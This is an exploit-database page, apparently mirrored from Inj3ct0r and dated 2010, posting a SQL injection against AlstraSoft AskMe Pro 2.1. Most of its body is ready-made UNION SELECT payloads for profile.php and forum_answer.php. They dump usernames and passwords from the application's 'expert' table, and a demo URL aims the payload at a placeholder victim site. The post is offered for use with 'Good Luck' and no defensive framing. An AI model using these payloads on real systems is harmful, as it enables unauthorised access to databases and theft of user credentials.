Home / os / win7

[webapps / 0day] - AlstraSoft AskMe Pro 2.1 SQL Injection Vu

Posted on 11 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>AlstraSoft AskMe Pro 2.1 SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Amine_92' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================
AlstraSoft AskMe Pro 2.1 SQL Injection Vulnerability
====================================================


# Author: Amine_92
# Email: amine92_16@hotmail.fr 
# Software Link: http://www.alstrasoft.com/askme.htm
# Version: All Version
# Price: 99.99$
# Tested on: Xp Sp 2
# Home: Dark Zone Organization (www.v9b.org/vb)
==================================================================
SQL injection in AlstraSoft AskMe Pro
 
Affected items:
http://www.Victime.com/forum_answer.php?que_id=[SQL]
 
http://localhost/[path]/profile.php?id=-5 union select 0,group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from+expert

Example:
-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
 
Demo URL:
http://www.Victime.com/forum_answer.php?que_id=-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
 
==================================================================
Good Luck
 
Tank&#039;s To : All Memeber Of Dark Zone &amp; Administrator Emptyzero
 
Don&#039;t Forget Our Brother In Gaza &amp; Palestine


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-11]</pre></body></html>

 

TOP

Malware :

Exploits :